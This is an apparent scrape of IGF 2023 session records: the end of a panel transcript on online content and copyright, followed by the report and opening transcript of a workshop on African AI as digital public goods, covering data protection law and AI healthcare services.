Sure. I don't have numbers to point to, but conceptually, we're in a golden age of content creation. There is more content being created, both professionally and non-professionally, than ever before in the history of mankind. I don't know if this is sustainable; I'm not an economist, I'm an engineer, but wow. You're going to look back in years to come and say there was this explosion of content everywhere in the 2020s like we've never seen before. When I was a kid growing up, you maybe got a new TV show here and there, and you were very excited in the fall when the new shows would come out. Now I'm in this 24-7, 365-day cycle where I'm constantly finding new content. It's amazing.

Konstantinos Komaitis:
But don’t you think that this is also because the creation of content has become much cheaper because of the internet?

Glenn Deen:
Absolutely. Somebody pointed out to me the other day that there's a new tool for your phone that can now do cinematic-quality video capture and processing. I think it has an AI component on the back end; it's literally like a cinematic-quality camera. And if you think about that, 10 years ago we would have been talking about the RED camera professionally, which was a very expensive, very specialized tool. Now people have it in their hand, on their phone, as a downloadable app. I think it may even be free. Like, wow.

Audience:
Thanks so much, Shane. My name is Talant Sultanov, from the Internet Society Kyrgyz chapter, and I wanted to follow up on your question on the global South and contribute to this debate on copyright. Our work was mostly related to connecting the remote communities of Kyrgyzstan to the Internet, and once we did that, we quickly realized there wasn't much content for the local communities, because everything was in Russian or in English, and people wanted content in the Kyrgyz language. We thought it would be easy: we would digitize, for example, the educational materials that the Ministry of Education has, books, and we couldn't, because they were all copyright protected. So we asked the Ministry of Education, can you give us the copyright? They said it belongs to the authors. The Ministry pays to have these books but doesn't want to hold the copyright, because then the responsibility for the quality of the book falls on the Ministry; if there is a mistake, they want it to be the author's mistake, not the Ministry of Education's. But for us, it was a challenge. We couldn't digitize these textbooks, and it was actually easier for us to find copyright-free Creative Commons materials from the global experience and translate them into the Kyrgyz language than to digitize the textbooks that were produced locally. So having Creative Commons materials was a real lifesaver for us. Thank you.

Moderator:
Has that market changed since you first started on that? Have you found that there's more in the Creative Commons than when you first were trying to use copyrighted work?

Audience:
Now we're finding a lot of useful materials globally. For example, we've adapted GSMA's mobile internet toolkit into the Kyrgyz language, and Microsoft's materials. They were all, of course, by commercial companies, but openly available. Also, we wanted to bring scientific experiments to rural schools. We thought we would produce them ourselves, but it was very expensive.
So we found biology, astronomy, and physics experiment videos online, three- to five-minute videos under Creative Commons, and we translated them into the Kyrgyz language using the voices of real local stars. In the end, these videos were even more user-friendly than the originals, because the originals were voiced by scientists, and these were voiced by actors. And I just wanted to end with this: through our work, we developed several principles that we've been applying. One is local language first, so anything we do, we now do in the Kyrgyz language. Then mobile first, because rural communities have very few computers, but everybody uses smartphones. This means, for example, that if we do textbooks, they can't be just PDFs; you have to be able to make the font smaller or larger, and they cannot be very heavy. During COVID, for example, the Ministry of Education scanned all the books they have, but the files were so heavy that when kids downloaded one book, all their money was gone, so they couldn't use it. The same goes for video, and we found ways to make them very light without losing quality.

Glenn Deen:
I just want to jump in here and say: one of my other hats is that I'm one of the IETF trustees, and what we actually do is manage the IP rights, the copyrights, on all the technical standards the IETF produces. I just want to chime in and say that for the IETF standards, one of the things we have pre-baked into the authorized uses is that you can translate them into any language you like. It's already enabled, permission already granted. So when you get to the IETF RFCs, you're good to go. Thank you.

Moderator:
Thank you for the question. We have a question down here. Do you mind just identifying yourself? Sorry, I didn't get to ask the other gentleman to do that. It's fine. Just push the button up. There you go. It works, yes.

Audience:
Thank you very much. My name is Peter Bruch. I’m the chairman of the World Summit Awards. We started in 2003 with a business process to create a global mechanism for looking at high-quality content. In the first year, 2003, we had 136 countries participating, and today it’s 182 countries, and we follow the United Nations system, so that each country has one entry in each of the eight categories of the Tunis action plan; so Talan, if he’s working from Kyrgyzstan, has one, the same as someone from the US, or from Australia, or from anywhere else. But I’m struck, I’m actually struck in awe by the quality of your conversation here, and I have not been privy to and part of it before. What I want to address here very much is the technologically fueled enthusiasm of Geoff Huston regarding different ways of thinking, and how the technology is actually turning the table upside down every three or five years. Obviously, when we look at quality of content, we have a promise, and Geoff, you related it to the library model of the internet, shifting then to the entertainment model, and you referred also to the mobile revolution. What the business process started off with is actually looking at this transformation through the internet into a knowledge society; it was the idea of the computerization of the 60s, 70s, and 80s, I guess. What we see here is that the market is actually very successful, and many of you have really stressed how, in terms of copyright, I think, Paolo, you made your three points regarding how the last 10 years have really shown, in terms of user-generated content, in terms of open source, and so on, how this has actually helped us shape the market in a positive way.
But I would think that we have not a market failure but a democracy failure, and the issue here is very much that the platform intermediaries, which Geoff is also talking about, and which have such a critical role, have cannibalized the editorial intermediaries. And that is something we have to really start thinking about in terms of what you were talking about also, Shannon, regarding the democracy issue. So we are basically creating not just one product for one taste on a scale of billions, but also social monads which are not relating to each other in a participatory way, but are paralleling each other in their existence, and then they are fueled by, and I don’t want to go into all the details of the analysis here. So my question is: what is it actually, in terms of the positive thinking, that the technology can deliver and the economics can sustain in terms of quality content, regarding what I would think is something like the editorial value-add? That would relate then to something like the Enlightenment idea of the public sphere, but I don’t want to go into that either. So thank you very much for listening to this.

Moderator:
I appreciate your comments. I’m just gonna check back in over here. Luke, did you want to add anything? You’ve been very patient through all this whole conversation. You’ve got a microphone right next to you right there.

Audience:
I just have one question, coming from a youth perspective, about copyright. On Instagram, there is actually a function to add audio that you have made to a reel. So for content creators, I’m just curious: let’s say you have a song, and you record the song, but you upload it as your own audio. What is the process then, what happens, and how do we educate the youth to better follow the best practices that are already in place, but that the youth may not know about?

Moderator:
Great, I think we know who that goes to.

LANTERI Paolo:
We can do copyright clinics at the IGF. I think it would be extremely useful, and we should suggest that. Luke, you’re talking about your originally created music uploaded on Instagram? Yeah, well, I must say I don’t know the details of the terms of use, but it must be something very similar to what happens on YouTube whenever you upload your video. Through that process, there is a disclaimer: you have to assert that you have the rights over the piece of music you are uploading. That’s the first thing. If you have the rights, you are signing a non-exclusive licensing agreement through which you basically allow Instagram to make it available, and unless you have a specific content deal, or you are a professional author or artist, you oftentimes don’t get any good economic deal out of it. So it’s a good start to make yourself known and to reach an audience, but what we see is that professional artists normally get a specific deal in order to receive some of the revenues generated through advertisement whenever their music is played. So read the terms of use carefully, and if you are planning to be a professional artist, then read even more carefully and ask someone to help you. But basically, it’s a copyright license, and since it is non-exclusive, once you upload the song you can also go somewhere else and license it, if it’s your song. But first step: you need to make sure it’s your creation.

Moderator:
All right, we are at time. Thank you all for being part of this very good discussion. It looks like we survived the last 10 years. I’m hoping that we can do this again in another 10 and see where we have come in. So I just want to appreciate everyone’s time this morning. Thank you, Jeff, for coming in remotely, and thank you for all of you who are participating here in the audience and those that helped us coordinate all this. So have a good day at the IGF. Thank you.

Audience
Speech speed: 157 words per minute
Speech length: 1372 words
Speech time: 526 secs

Geoff Huston
Speech speed: 163 words per minute
Speech length: 2485 words
Speech time: 915 secs

Glenn Deen
Speech speed: 205 words per minute
Speech length: 2090 words
Speech time: 612 secs

Konstantinos Komaitis
Speech speed: 180 words per minute
Speech length: 1583 words
Speech time: 528 secs

LANTERI Paolo
Speech speed: 149 words per minute
Speech length: 3477 words
Speech time: 1404 secs

Moderator
Speech speed: 214 words per minute
Speech length: 2159 words
Speech time: 607 secs

Online Moderator
Speech speed: 172 words per minute
Speech length: 1168 words
Speech time: 406 secs

Stella Anne Ming Hui Teoh
Speech speed: 195 words per minute
Speech length: 551 words
Speech time: 169 secs

African AI: Digital Public Goods for Inclusive Development | IGF 2023 WS #317

Full session report

Audience

The analysis covers several topics related to the development of AI and its impact on society. One key point is the significance of data infrastructure and access to compute for the democratization of AI: the lack of proper data infrastructure can hinder the development and use of AI, especially in contexts like Africa or the global South.

A related point is the need to address challenges regarding data infrastructure and compute access, so that AI can be effectively utilized and its benefits made accessible to all.

The analysis also touches upon AI policy and legislation in Kenya, asking whether Kenya has a specific AI policy in place and corresponding legislation to operationalise it.

Lastly, the analysis raises the topic of human-robot interaction, specifically how human workers should perceive and interact with robots.

In conclusion, the audience contributions raise open questions on data infrastructure, access to compute, AI policy and legislation, and human-robot interaction, though they offer little supporting evidence, which limits the depth of the analysis.

Yilmaz Akkoyun

AI has the potential to significantly impact inclusive development and help achieve the Sustainable Development Goals (SDGs). It can play a crucial role in improving access to medical services and increasing efficiency in agriculture, which can contribute to the goals of good health and well-being (SDG 3) and zero hunger (SDG 2). AI applications can facilitate medical service delivery by assisting in diagnostics, monitoring patients’ health, and providing personalized treatment. In agriculture, AI can enhance productivity, optimize resource usage, and improve food security.

However, there are challenges associated with the access and negative effects of AI that disproportionately affect developing countries (SDG 10). Only a fraction of the global population currently has access to AI applications tailored to their specific needs. This digital divide reinforces existing inequalities and limits the potential benefits of AI for those who need it the most. Moreover, negative impacts of AI, such as job displacements and bias in decision-making algorithms, can exacerbate existing inequalities in developing countries.

Ethical considerations and the regulation of AI are also critical. Risks associated with AI range from high greenhouse gas emissions to digital disinformation and risks to civil and democratic rights (SDG 16). To ensure the responsible and fair development and use of AI, it is essential to promote ethical principles and practices. This includes addressing issues such as algorithmic bias, ensuring transparency and accountability, and safeguarding privacy and human rights.

In order to reduce inequalities and ensure diverse representation, it is important to have AI expertise and perspectives from various regions, including African countries (SDG 10). Africa has seen the emergence of various AI initiatives, and it is crucial to involve these initiatives in shaping the global conversation around AI. This will help ensure more equitable development and minimize the risk of marginalization.

The German Federal Ministry for Economic Cooperation and Development (BMZ) is committed to supporting the realization of AI’s potential through local innovation in partner countries (SDGs 8 and 9). The BMZ believes that digital public goods, such as open AI training datasets and research, are important enablers of economic and political participation. These measures can enhance economic growth and create opportunities for communities to harness AI for their specific needs.

Access to open AI training data and research, as well as open-source AI models, is considered foundational for local innovation (SDG 9). By sharing relevant data, AI models, and methods openly as digital public goods, a global exchange of AI innovations can be fostered, benefiting various regions and promoting cross-cultural collaboration.

In conclusion, AI holds tremendous potential for inclusive development and the achievement of SDGs. However, challenges of access, negative effects, and ethical concerns must be addressed. It is essential to ensure diverse representation, particularly from regions such as Africa, and promote ethical AI practices. Open access to AI training data and research is crucial for fostering local innovation and accelerating progress towards the SDGs. The African AI initiatives are inspiring and underscore the need for continued dialogue and learning about AI’s impact on development.

Zulfa Bobina

AI technologies as digital public goods are described as an ideal that has not yet become a reality, more of a future aspiration than something currently achievable. However, there is optimism about the future growth of AI technologies and collaborations: more work is being done in the advocacy space, which is believed to lead to more widespread adoption of AI technologies.

Civil society is seen as playing a vital role in addressing ethical considerations related to AI. It is believed that civil society can step in to address these concerns and ensure that AI technologies are developed and deployed ethically and responsibly. Efforts are being made to address these ethical concerns through research and advocacy.

There is a need for comprehensible communication regarding AI technologies. It is argued that explaining technologically complex concepts in simple language can help the general population understand and incorporate these technologies into their lives. The goal is to avoid elitism in technology comprehension and ensure that everyone has access to and understands AI technologies.

The often overlooked human workforce behind automated technologies is being highlighted and advocated for. It is recognized that automation and AI technologies can have a significant impact on the workforce. Therefore, efforts are being made to support and advocate for the rights of these workers to ensure fair treatment and protection in the face of technological advancements.

Harmonizing collective and individual rights is emphasized, particularly when it comes to data rights. It is argued that adopting western blueprints of data rights that focus solely on individual rights may not be suitable for African societies. There is a need for more balanced regulations that take into account both collective and individual rights.

Discussions around AI technologies as a public good are considered important. There are considerable discussions taking place, especially at events like the Kyoto summit. Furthermore, public interest in data and AI technologies is growing, highlighting the need for ongoing discussions and dialogue as technologies progress.

Overall, there is excitement about the various activities happening across the continent in the field of AI and technological developments. These advancements are seen as opportunities for growth and progress. While there are challenges and ethical considerations to address, there is an optimistic outlook for the future of AI technologies in Africa.

Darlington Akogo

Mino Health AI Labs, a leading healthcare technology company, has developed an advanced AI system that can interpret medical images and deliver results within seconds. This groundbreaking technology has received approval from the FDA in Ghana and has attracted users from approximately 50 countries across the globe. By providing fast and accurate results in medical image interpretation, the AI system has the potential to significantly accelerate and streamline healthcare processes.

Although the benefits of AI applications in healthcare are evident, it is crucial to subject these systems to rigorous evaluation processes, especially in healthcare. Approval of AI systems by health regulators can be challenging and requires extensive testing to ensure their effectiveness, reliability, and safety. It is essential to distinguish between AI research or prototypes and their real-world implementations, as the latter demands meticulous scrutiny and validation.

Considering the perspective of users is another important aspect of AI implementation. Users should actively participate in determining the features and operations of AI systems, particularly in healthcare. This ensures that these systems seamlessly integrate into users’ workflow and effectively meet their specific needs. Their input provides valuable insights on optimizing the functionality and usability of AI solutions, ultimately enhancing their impact in healthcare.

Moreover, the concept of businesses being built around solving problems connected to the Sustainable Development Goals (SDGs) has gained prominence. Companies such as Mino Health align their business strategies with addressing issues related to healthcare access and food security, demonstrating a positive approach towards achieving the SDGs. By focusing on solving socially significant problems, businesses can contribute to broader societal goals and make a tangible difference in people’s lives.

To guide businesses in achieving a balance between profit and impact, the concept of an internal constitution has emerged. This moral code acts as a set of guidelines for the company’s operations and ensures that its decisions and actions align with its core values. In certain cases, even the CEO can be voted out if they deviate from the principles outlined in the internal constitution. This mechanism promotes a sense of ethical responsibility within the business and encourages a long-term view that prioritizes societal welfare alongside financial success.

Furthermore, businesses can be registered for public good, which implies an obligation to prioritize the public interest over the interests of shareholders and investors. This designation reinforces the idea that businesses should focus on the common good, aiming to create positive social impact rather than solely maximizing profits. By doing so, businesses can align their objectives with the well-being of communities and contribute to the achievement of the SDGs.

Artificial intelligence (AI) has tremendous potential in aiding the attainment of the SDGs. The ability of AI to process vast amounts of data and derive actionable insights can be instrumental in addressing complex societal challenges. Investing in AI can be a strategic approach to tackling the problems identified within the SDGs, as it enables the development of innovative solutions and the efficient allocation of resources.

However, while harnessing the power of AI is essential, it is equally important to exercise responsibility and adhere to ethical frameworks. The transformative nature of AI technology calls for careful consideration of its potential risks and impacts. Leveraging AI in a responsible manner involves issues such as bias, accountability, and privacy, among others. Operating within ethical boundaries is crucial to prevent the emergence of new problems that could arise from unchecked deployment of AI systems.

In summary, Mino Health AI Labs has made significant advancements in the field of healthcare through the development of their AI system for medical image interpretation. However, the successful implementation of AI in healthcare requires rigorous evaluation, active user involvement, and a focus on aligning business strategies with the SDGs. The concept of an internal constitution and the registration of businesses for public good provide mechanisms to guide companies towards balancing profit and societal impact. AI, if invested in responsibly, holds the potential to address the challenges addressed within the SDGs. At this pivotal juncture in history, there is a need to harness AI technology while ensuring its ethical and responsible use to avoid unforeseen consequences.

Meena Lysko

During the discussion on industry, innovation, infrastructure, and data privacy in South Africa, several important topics were addressed. One of the key points highlighted was the implementation of the Protection of Personal Information Act (POPI Act) and the Cyber Crimes Act. These acts were considered crucial for prioritising the safeguarding of personal information and for providing a legal framework to address various digital offences.

It was acknowledged that challenges arise in striking the balance between innovation and compliance in digital privacy. However, the speakers emphasised that the POPI Act and the Cyber Crimes Act play a vital role in ensuring responsible handling of data by organisations in South Africa.

Collaboration between businesses, individuals, and law enforcement agencies was emphasised as imperative in moving forward with the implementation of these acts. This collaboration is seen as a key factor in promoting the responsible use of personal information and in effectively addressing digital offences. The need for joint efforts in creating a secure and ethical digital environment was highlighted.

Another significant point discussed was the incorporation of ethics in the AI systems lifecycle. It was emphasised that ethics should be included from conception to production of AI systems. This includes the integration of a module on AI ethics and bias in training programmes. Ethical competence, which includes knowledge of laws and policies, was deemed necessary for individuals involved in AI development. Additionally, the need for an ethically tuned organisational environment was highlighted to ensure the responsible and ethical use of AI systems.

The importance of industry interaction in AI and data science training was also emphasised. The inclusion of industry experts in training sessions was seen as a means of facilitating knowledge sharing and promoting morally sound solutions. This collaboration between the training programmes and industry experts was found to be beneficial in keeping up with the latest trends and developments in the field.

The positive impact of training programmes on participants was highlighted with the assertion that these programmes support quality education, industry innovation, infrastructure development, zero hunger initiatives, and responsible consumption. The post-training feedback from previous programmes indicated that the training positively influenced the participants.

Lastly, the use of open AI systems was advocated as a means of contributing to sustainable digital development. It was noted that proprietary AI systems are generally used to make money, ensure security, empower technology, and simplify tasks. However, open AI systems were proposed as a more sustainable alternative for digital development.

In conclusion, the discussion highlighted the significance of the POPI Act and the Cyber Crimes Act in South Africa for ensuring personal data protection and addressing digital offences. Collaboration between businesses, individuals, and law enforcement agencies was deemed essential in moving forward with these acts. Ethics in AI systems development and the incorporation of industry interaction in training programmes were emphasised. The positive impact of training programmes on participants and the advocacy for the use of open AI systems in sustainable digital development were also discussed as important aspects of the conversation.

Susan Waweru

The Kenyan government has demonstrated a strong commitment to implementing and adhering to policies related to artificial intelligence (AI) and digital transformation. The Constitution of Kenya plays a significant role in guiding the development and use of AI. It includes provisions that emphasise transparency, accountability, and the protection of privacy rights. This indicates that the government recognises the fundamental importance of privacy in AI systems.

Moving beyond theoretical frameworks to actual implementation is a crucial step in the development of AI. The government understands the significance of leadership commitment in successfully executing plans. Without strong leadership support and commitment, the implementation and execution of policies become challenging.

The Kenyan government is actively pursuing digitisation and aims to develop an intelligent government. Key efforts in this direction include onboarding all government services onto eCitizen, a platform that provides online access to government services. The President himself is overseeing the Digital Transformation Agenda, highlighting the government’s high level of interest in digitisation. Currently, the government’s focus is on infrastructure development to support these digital initiatives.

Privacy and accessibility are two important principles emphasised in the development of digital public goods and AI technology. The government recognises that video surveillance mechanisms should respect privacy and not infringe on people’s freedoms. The Data Protection Act in Kenya primarily affects data controllers and processors, ensuring that personal data is handled with care and protects individual privacy.

To further support AI development, the Kenyan government is working towards separate legislation and strategies specifically for AI. This demonstrates a commitment to creating a comprehensive and focused approach to AI policy. The government is actively drafting AI legislation and has established a central working group to review and update tech-related legislations, policies, and strategies.

In line with their commitment to effective governance, the Kenyan government is developing an AI chatbot. This chatbot, using natural language processing with large datasets, is aimed at enhancing compliance and bringing government services closer to the people. It will be available 24/7, providing services in both English and Swahili.

Demystifying AI and promoting human-centred design are also important aspects. The government recognises that creating awareness and understanding among the public can enhance the adoption and reduce fear of AI. In addition, a focus on human-centred design ensures that AI development prioritises the needs of citizens over the benefits of organisations.

Finally, the benefits of AI, especially in public service delivery, are highlighted. The government acknowledges that AI has the potential to provide significant benefits to its citizens. The aim is to ensure that the advantages of AI technology outweigh any potential risks.

In conclusion, the Kenyan government has taken substantial steps towards implementing and adhering to AI and digital transformation policies. With a strong commitment to privacy, accessibility, and human-centred design, as well as efforts to develop separate AI legislation and strategies, the government is actively working to create a more inclusive and technologically advanced society. Through initiatives such as the AI chatbot and the digitisation agenda, the government aims to provide efficient and accessible services to its citizens.

Moderator – Mark Irura

During the discussion, several important topics related to healthcare and the implementation of digital solutions were discussed. Mark Irura emphasised the need for risk assessment and harm prevention when incorporating digital solutions. He highlighted the importance of evaluating potential risks and taking necessary precautions to protect individuals from physical, emotional, and psychological harm. Irura also stressed the importance of implementing data protection protocols to safeguard sensitive information and maintain citizens’ privacy.

The discussion also acknowledged the challenge of balancing business interests with Sustainable Development Goals (SDGs) and the integration of artificial intelligence (AI). It was recognised that business requirements and regulations may take precedence at times, making it difficult to align them with the objectives of sustainable development and the use of AI technologies. The speakers agreed that finding a harmonious balance between these different aspects is crucial to ensure the successful implementation of digital solutions that contribute positively to both business interests and the achievement of SDGs.

Mark Irura further emphasised the need for developing strategies that can effectively align business objectives, SDGs, and AI technologies. He inquired about the approach used to align these elements in addressing various challenges. This highlights the importance of creating a comprehensive framework and implementing strategies that consider all three components, providing a cohesive and integrated approach to problem-solving.

Overall, the speakers strongly emphasised the need for rigorous certification processes, active user involvement in decision-making processes, and robust data protection measures. These measures are crucial to mitigate risks and ensure the well-being of individuals when implementing digital solutions. The discussion conveyed the wider implications of the implementation process and the importance of responsible use of AI technologies in healthcare and other sectors.

Session transcript

Moderator – Mark Irura:
I want to check also if the colleagues online have been able to join. Bobina, Dr. Meena, and Darlington, are you online with us?

Meena Lysko:
This is Mina. Yes, I am online. Thank you.

Moderator – Mark Irura:
Bobina? Perfect.

Zulfa Bobina:
Hello. I’m here as well.

Moderator – Mark Irura:
All right, thank you. So we are missing Darlington, but we’ll start with the session. I will start with introductions. My name is Mark Irura, and today we are here to talk about AI and its use, particularly for sustainable development as far as digital public goods are concerned. It’s some work that we have been doing in Africa, and we will do a little bit of a deep dive, looking at some of the things that we have done as a program within GIZ, but also exploring some of the risks that are coming out in the discussions that we have. With us today, we have Yilmaz from the Federal Ministry for Economic Cooperation and Development, BMZ. We have Susan Waweru seated beside me; she’s the head of legal at the Office of the Data Protection Commissioner. We have Dr. Meena Lysko, who brings on board her experience having worked with government, academia, and the private sector, and who is currently a director at Move Beyond Consulting, based in South Africa. And we have Bobina Zulfa. Bobina is an AI and data rights researcher at Policy, based in Uganda. Policy is a feminist collective of technologists, data scientists, creatives, and academics working at the intersection of data, design, and technology to see how government can improve on service delivery. We’ll start with a keynote from Yilmaz, who will give us a high-level overview of what they are doing before we delve into the conversation. So over to you. Thank you.

Yilmaz Akkoyun:
Dear Mark, distinguished guests and colleagues, dear ladies and gentlemen, dear IGF friends, it is a great honor and pleasure, on behalf of the German BMZ, to share a few opening remarks today highlighting the potential of AI, especially African AI, for inclusive development. What is the potential of AI for inclusive development? I think we already heard a lot on day zero and today. In my view, it can be instrumental in achieving the SDGs. AI can facilitate medical service delivery, increase efficiency in agriculture, and improve food security, all challenges of our time. Yet only a fraction of the population worldwide has access to AI applications that are tailored to their needs, and we want to change this. This is why we are here. On top of that, the negative effects of AI disproportionately affect developing countries, especially in the global south. However, we also need to be aware of the risks related to AI. These risks range from the high greenhouse gas emissions of large language models to digital disinformation and risks to civil and democratic rights. The international community is becoming increasingly aware of these issues, and we see it here at the IGF. Accordingly, in my view, the promotion of ethical, fair, and trustworthy AI, as well as the regulation of its risks, is beginning to be addressed at the global level, as we heard this morning in the G7 context of the AI Hiroshima process. AI has been addressed in the UN, G7, and G20, and international organizations such as UNESCO and the OECD have published principles and clear recommendations that aim to protect human rights with AI on the rise worldwide. The EU is at the forefront of regulating AI with the EU AI Act, and Secretary-General Guterres is convening a multi-stakeholder high-level advisory board for AI that will include emerging and developing countries.
I think these conversations between countries from the Global North and the Global South are essential so we can make sure that AI benefits all. And when talking about AI, we mostly hear about models and applications developed in Silicon Valley, in California in the US, or in Europe, but there’s so much more. And we discuss large language models that represent and benefit only a fraction of the world population. That is why I’m especially excited to hear about AI use cases today that were developed and deployed in African countries, that truly represent African AI, and that were designed specifically to benefit the public in African countries. As the German Federal Ministry for Economic Cooperation and Development, we want to enhance the economic and political participation of all people in our partner countries. And we are very eager to support our global partners to realize the potential of AI through local innovation in the countries that we are talking about here in this session. We are very committed to the idea that digital public goods are an important enabler. For example, to be more concrete, access to open African language datasets is supporting local governments and the private sector in building AI-empowered services for citizens. For instance, our initiative Fair Forward contributes to the development of open AI training datasets in different languages, Kiswahili, Kinyarwanda, and Luganda, languages spoken by more than 150 million people collectively. And some of the examples we’ll get to know in this session are built on these language datasets. I’m looking forward to this very much. And to give you an outlook, we see open access to AI training data and research, as well as open-source AI models, as the foundation for local innovation. Therefore, relevant data, AI models, and methods should be shared openly as digital public goods.
To realize the potential of AI for inclusive and sustainable development, we need to make sure at the same time that AI systems are treated as digital public goods. Open, transparent, and inclusive at the same time. In this way, a global exchange on AI innovations can emerge. This IGF with AI being mentioned in so many sessions is one starting point for the global exchange. And now, I’m looking very much forward to the use cases. And thank you so much for being part of this wonderful session.

Moderator – Mark Irura:
Thank you so much. So, before we dive in, and building upon that, we are taking a critical approach to try and see how we are beginning to define what AI means to us on the continent, the African continent. And today, we specifically have this idea that we can actually build solutions and systems and not just look at it from a policy and a framework perspective, so to speak. And I will start with Susan, because she’s in the room and in the hot seat. And I will ask you to start with the framework, right? And with what the Office of the Data Protection Commissioner is doing in Kenya as far as thinking about AI is concerned. And then, also explore if you have any ideas and context about what is happening in the rest of the continent.

Susan Waweru:
Thank you, Mark, for your question. And good evening to all. As you’ve heard, my name is Susan Waweru, from the Office of the Data Protection Commissioner in Kenya. As we may be aware, in the AI context, privacy is of fundamental importance to ensure that AI works for the benefit of the people and not to their harm. On the frameworks: in Kenya, the top echelon of frameworks is the Constitution of Kenya. Within that constitution, we have several provisions that guide AI in Kenya now. One of them is the values and principles of governance. From a government perspective, we are bound to be transparent, to be accountable, to be ethical in everything that we do. This includes the deployment of AI for public service, in service delivery in all forms. Secondly, we have the values and principles of public service. These are the values and principles that govern us as public servants in how we carry out our public duties. So, that is what, at a constitutional level, we will be guided by in the deployment of AI in the delivery of services. Of most importance is the Bill of Rights and Fundamental Freedoms. Within that Bill of Rights and Fundamental Freedoms, which is also in our constitution, we have the right to privacy. The right to privacy is what births data protection laws, data protection policies, and data protection frameworks in Kenya. So, having the top organ, the grundnorm, in Kenya give the guardrails by which AI, privacy, and data protection will be guided provides a good background and a firm foundation from which any other strategy or policy in tech or in AI can then spring. It forms the global guardrail for everything that should be done. So, it may not specifically touch on AI, but these values and principles, the Bill of Rights and Fundamental Freedoms, give you the constitutional guardrail of what you can and cannot do in the AI space. And it is that mark, then, that all other frameworks, including the AI strategy and the digital master plan, must adhere to.

Moderator – Mark Irura:
Thanks. Thanks, Susan. And building upon that, and the knowledge that we have these things anchored in a constitution or in principles that you want to develop, we then have digital public goods. And digital public goods are ways in which government is offering shared services. So, if you have a registry, for example, a civil birth and death registry, how can it be leveraged across government, rather than the social security fund, the hospital insurance fund, and the tax administration all having their own registers, duplicating that effort? And from that knowledge, and because we have seen how multiple registers affect how government delivers services, we see the need for adopting this in government, because it can be cheaper. It can be cheaper in terms of how government procures these services. And I’m giving this background because I do not know if Darlington is online. Is Darlington there? All right. So, you can introduce yourself and then move on to the question and share with us what you’re doing in West Africa. And then you can also talk a little bit about the lessons you’re learning from the work that you’re doing. And are you using any digital public goods approaches in your work? So, over to you, Darlington. Thank you.

Darlington Akogo:
Thank you for having me. My name is Darlington Akogo, founder and CEO of Mino Health AI Labs and KaraAgro AI. I’m in a moving vehicle, so apologies for any sounds. What we do at Mino Health AI Labs is build artificial intelligence solutions for healthcare. And, connected to the question, we do have one AI system that is focused on medical image interpretation. We got the health regulator in Ghana, FDA Ghana, to certify and approve this AI system. So, we rolled it out. We have users from all over; we’ve had sign-ups from about 50 countries around the world. In Ghana, we have it being used in the capital cities, but also in some small towns. And we are expanding access to even really rural areas. The benefit of this AI system to the communities, for example, is that by default, if you go take a medical image, an x-ray, for example, it will take several weeks before you get the results, because there are very few radiologists. In Ghana, for example, there are about 40 radiologists. If you take an African country like Liberia, they have fewer than five radiologists. So, what this AI system does is help speed up that process by using AI to interpret that medical image. We have it online at platform.minohealth.ai, and this AI system is able to generate results in just a few seconds. In about five, ten seconds, you get the results. So, what used to take weeks can now take just a few seconds. It makes all the difference in healthcare, because you want to know exactly what is wrong with people quickly enough that you can respond to it. The lessons we’ve learned are quite a lot. One key one is that within the space of AI, there’s a huge difference between doing AI for research, or some sort of demo proof of concept, and building real-world AI that is meant to work with real humans.
There’s a whole lot of difference. The key thing is the rigorous evaluations you need to do. And this is super applicable in healthcare. So, getting the AI system certified by the FDA or a health regulator is a very, very major step, and what it takes to get health regulators to certify an AI system for some use cases is quite a lot. But then, you learn a lot of lessons. So, one of the key things we learned is just to double down on rigorous evaluation. The other bit is, you don’t want to build the AI system on your own and just hand it over to the users. Let them decide what kind of features they want, how they want the AI system to fit into their workflow. That is very important.

Moderator – Mark Irura:
Thank you so much, Darlington. Thank you. And moving from what you’ve just said, I will turn to you, Meena. Darlington just said it’s very different when you’re doing a research project versus when you’re actually implementing a solution. There are a lot of things; there are a lot of risks. And, from the word go, I think one of the approaches from a digital public goods perspective, or a DPI perspective, a digital public infrastructure perspective, is to ask: can we cause harm? What are the risks? How might we expose data we shouldn’t expose, and how do we protect the code bases we should, so that there are no harms that ultimately translate to the citizens? So, I will invite you to reflect on that. Thank you.

Meena Lysko:
Thank you. Thank you very much, Mark. And perhaps, firstly, thank you for this platform and for giving me the opportunity to e-visit Japan. I do wish I could have been there in person. I could not, and I apologize for that. So, thank you for this opportunity to e-visit Japan and, in fact, the captivating and quite unique city of Kyoto. I know it is the birth city of Nintendo, and it hosts a phenomenal number of UNESCO World Heritage Sites. So, Mark and team, I am very envious of you. I was also intending to share some of the work we have done or are doing, so I will come back to it. In terms of your question, looking at AI ethics and governance standards, first in South Africa: we have an ever-evolving digital landscape, and we have the Protection of Personal Information Act, or POPI Act, and the Cybercrimes Act, which stand as significant legal frameworks shaping the realm of data privacy, security, and digital crime prevention. The POPI Act, enacted in South Africa, prioritizes the safeguarding of individuals’ personal information. It encourages responsible data handling by organizations. The POPI Act’s emphasis on individual privacy is reshaping the way organizations collect and manage personal data, and it prompts them to adopt stringent data protection measures. Perhaps I can give an example. I frequently get these sort of annoying calls, and I ask, how did you get my number? And then I go on to say, you do know that I have not shared my number with you willingly, so this is against the POPI Act. And very often the phone goes down immediately. So, people in South Africa are very aware of the POPI Act, and people feel safeguarded through it. However, challenges do emerge in balancing innovation and compliance, especially in the age of digital privacy.
In parallel to the POPI Act, we have the Cybercrimes Act. This addresses the escalating threat of cybercrime by providing a legal structure to tackle various digital offenses, thereby fortifying the defenses against cyber threats. So, moving forward, I think it becomes quite imperative for businesses, individuals, and law enforcement agencies to collaborate in the implementation of these acts. Thank you, Mark.

Moderator – Mark Irura:
Thank you, Meena. And I turn to you, Bobina. So we’ve talked about digital public goods. We’ve talked about how we protect citizens. And Susan gave a very good introduction on what is being done as far as the frameworks that we have on data rights are concerned. SDG number 17 talks about partnerships. As civil society, in this particular field of digital public goods, do you have any collaborations with other stakeholders, whether in the private or public sector? And do you think, and that’s loaded, do you think that there’s alignment, from what you can see in the landscape, with sustainable development as far as AI is concerned right now? Over to you, Bobina.

Zulfa Bobina:
Okay, thank you, Mark. Please allow me to turn off my video because my internet is unstable. Can you hear me?

Moderator – Mark Irura:
Yes, yes, we can hear you.

Zulfa Bobina:
Yes?

Moderator – Mark Irura:
Yes, go for it.

Zulfa Bobina:
